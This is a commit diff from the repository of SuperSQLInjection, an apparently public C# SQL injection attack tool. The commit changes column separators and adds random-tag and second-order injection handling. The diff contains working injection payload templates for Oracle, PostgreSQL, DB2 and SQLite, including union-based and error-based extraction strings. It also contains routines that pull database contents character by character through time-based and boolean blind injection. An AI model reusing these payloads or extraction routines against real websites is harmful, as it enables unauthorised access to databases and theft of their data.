shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

更新分隔符问题

Browse Source
This commit is contained in:
shack2
2020-05-27 11:37:39 +08:00
parent bbe5a271d2
commit c89bc8f235
10 changed files with 61 additions and 60 deletions
Download Patch File Download Diff File Expand all files Collapse all files

57
SuperSQLInjection/Main.cs
View File

@@ -286,7 +286,7 @@ namespace SuperSQLInjection
responseStream.Close();
}
public static int version = 20200209;
public static int version = 20200527;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
@@ -792,10 +792,8 @@ namespace SuperSQLInjection
this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info);
stp.Cancel();
this.currentThread.Abort();
}
status = 0;
}
public void getVariablesByUnion(DBType dbType)
@@ -2710,11 +2708,9 @@ namespace SuperSQLInjection
{
//2分法获取中间数字
mid = Tools.getLargeNum(start, end);
payload = ByPassForBetween(payLoadStr, mid);
ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode);
if (end == start)
{
if (exists)
@@ -2723,9 +2719,7 @@ namespace SuperSQLInjection
}
else
{
return end;
}
}
if (exists)
@@ -5141,47 +5135,21 @@ namespace SuperSQLInjection
String va_payload = MySQL.ver_value.Replace("{data}", data_payload);
String colvalue = "";
//获取值
for (int i = 1; i <= len; i++)
{
String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "");
String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload);
int mu_payload_len = 0;
//MySQL多字节ord先判断ord后的长度在取每一个的值
String tmp_va_payload = va_payload.Replace("{index}", i + "");
int ascii = 0;
if (config.keyType.Equals(KeyType.Time))
{
mu_payload_len = getValue(MySQL.getBoolDataBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8);
ascii = getValue(tmp_va_payload, 0, 127);
}
else
{
mu_payload_len = getValue(plen, 2, 8);
ascii = getValue(tmp_va_payload, 0, 127);
}
//判断ord转换后的字符长度
int m_index = 1;
String[] ver_tmp = new String[mu_payload_len];
while (m_index <= mu_payload_len)
{
int ascii = 0;
if (config.keyType.Equals(KeyType.Time))
{
ascii = getValue(MySQL.getBoolDataBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9);
}
else
{
ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9);
}
ver_tmp[m_index - 1] = ascii + "";
m_index++;
}
//设置值,这里由于是hex值需要转换
String hexstring = Tools.convertToString(ver_tmp);
String hexvalue = Convert.ToString(int.Parse(hexstring), 16);
colvalue += Tools.unHex(hexvalue, config.db_encoding);
colvalue += ((char)ascii).ToString();
}
if (lvi == null)
{
lvi = new ListViewItem(colvalue);
@@ -6043,6 +6011,7 @@ namespace SuperSQLInjection
GetDataPam gp = (GetDataPam)opam;
ListViewItem lvi = new ListViewItem();
String result = getOneDataByUnionOrError(SQLServer.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns));
result = HttpUtility.HtmlDecode(result);
//数结果改成xml格式单独解析
addItemToListViewBySQLServerXMLData(result, gp.columns);
@@ -10804,7 +10773,15 @@ namespace SuperSQLInjection
private void btn_inject_randStr_Click(object sender, EventArgs e)
{
this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
if (this.txt_inject_request.SelectedText.Length > 0)
{
this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
}
if (this.txt_sencond_request.SelectedText.Length > 0)
{
this.txt_sencond_request.SelectedText = "<Rand>" + this.txt_sencond_request.SelectedText + "</Rand>";
}
}
private void txt_sencond_request_TextChanged(object sender, EventArgs e)

19
SuperSQLInjection/bypass/StringReplace.cs
View File

@@ -11,10 +11,25 @@ namespace SuperSQLInjection.bypass
{
class StringReplace
{
public static String strReplaceCenter(Config config, String request, Hashtable replaceList)
public static String lastRand = "";
public static String lastpayload = "";
public static String strReplaceCenter(Config config, String request, Hashtable replaceList,String payload)
{
//修改随机值
request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", System.Guid.NewGuid().ToString("N"));
String rand = "";
if (payload.Equals(lastpayload)) {
rand = lastRand;
}
else {
rand = System.Guid.NewGuid().ToString("N");
}
if (payload.Equals("请求二次注入页面")) {
rand = lastRand;
}
request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", rand);
lastRand = rand;
lastpayload = payload;
//找到需要处理的字符
MatchCollection mc = Regex.Matches(request, "(?<=(\\<Encode\\>))[.\\s\\S]*?(?=(\\<\\/Encode\\>))");
String str="";

4
SuperSQLInjection/payload/Comm.cs
View File

@@ -8,8 +8,8 @@ namespace SuperSQLInjection.payload
class Comm
{
public const String COLUMNS_SPLIT_STR = "$_$";
public const String COLUMNS_REG_SPLIT_STR = "\\$_\\$";
public const String COLUMNS_SPLIT_STR = "$\t$";
public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$";
public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8");
public static String exists_table = " exists(select 1 from {0})";

2
SuperSQLInjection/payload/DB2.cs
View File

@@ -82,7 +82,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(String unionFileTemplate, List<String> columns, String dbname, String table, String index)
{
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
return union_value.Replace("{data}", template);
}

2
SuperSQLInjection/payload/Informix.cs
View File

@@ -38,7 +38,7 @@ namespace SuperSQLInjection.payload
public static String substr = "substr(({data})),{index},1)";
//多字节
public static String hex_value = "ascii({data})";
//public static String hex_value = "ascii({data})";
//bool方式字符长度判断
public static String bool_length = " length(({data}))>{len}";

4
SuperSQLInjection/payload/Oracle.cs
View File

@@ -91,7 +91,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
@@ -163,7 +163,7 @@ namespace SuperSQLInjection.payload
public static String getDataValue(List<String> columns, String dbName, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||");
String data = Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||");
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
sb.Remove(sb.Length - 1, 1);

6
SuperSQLInjection/payload/PostgreSQL.cs
View File

@@ -81,7 +81,7 @@ namespace SuperSQLInjection.payload
//error方式
public static String error_value = " 1=cast((chr(94)||chr(94)||chr(33)||({data})||chr(33)||chr(94)||chr(94)) as numeric)";
public static String hex = "(select hex({data}))";
//public static String hex = "(select hex({data}))";
public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
public static String substr_value = "(select substr({data},{start},{len}))";
@@ -126,7 +126,7 @@ namespace SuperSQLInjection.payload
/// <param name="index">第几行数据1开始</param>
public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
{
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(9)||chr(36)||"));
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
return error_value.Replace("{data}", d);
}
@@ -179,7 +179,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)

2
SuperSQLInjection/payload/SQLite.cs
View File

@@ -52,7 +52,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)

2
SuperSQLInjection/tools/Tools.cs
View File

@@ -498,7 +498,7 @@ namespace tools
case KeyType.Time:
//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
int time = Tools.convertToInt(key);
if (server.runTime > (time*1000-(time*deviation)))
{

23
SuperSQLInjection/tools/http/HTTP.cs
View File

@@ -42,7 +42,7 @@ namespace SuperSQLInjection.tools
public const int WaitTime = 5;
public static Main main = null;
public static long index = 0;
public static String LastToken ="";
public const String Socks5ProxyType = "Socks5";
public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED";
@@ -82,6 +82,7 @@ namespace SuperSQLInjection.tools
{
ServerInfo tserver = HTTP.sendRequestRetryNoToken(isSSL, tryCount, host, port, "获取Token", main.config.token_request, timeout, encoding, foward_302, redirectDoGet);
token = Tools.substr(tserver.body, main.config.token_startStr, main.config.token_endStr);
}
request = Regex.Replace(request, "(\\<Token\\>[.\\s\\S]*?\\<\\/Token\\>)", token);
}
@@ -338,7 +339,7 @@ namespace SuperSQLInjection.tools
if (port > 0 && port <= 65556)
{
request = request.Replace(Main.setInjectStr, payload);
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
//编码处理
server.request = request;
@@ -483,11 +484,15 @@ namespace SuperSQLInjection.tools
return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet);
}
}
//超时
if (server.code >501&&server.code <505)
{
throw new Exception("http访问异常-code:"+ server.code+"");
}
//根据请求头解析
if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
//根据请求头解析
if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
{
int length = int.Parse(server.headers[Content_Length]);
while (sum < length && sw.ElapsedMilliseconds <= timeout)
@@ -764,7 +769,7 @@ namespace SuperSQLInjection.tools
request = request.Replace(Main.setInjectStr, payload);
//编码处理
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
TimeOutSocket tos = new TimeOutSocket();
if (main.config.proxy_mode == 1 || main.config.proxy_mode == 2)
{
@@ -920,7 +925,11 @@ namespace SuperSQLInjection.tools
}
//超时
if (server.code > 501 && server.code < 505)
{
throw new Exception("http访问异常-code:" + server.code + "");
}
//根据请求头解析
if (server.headers.ContainsKey(Content_Length) && server.header.IndexOf(Content_Length_Zero) == -1)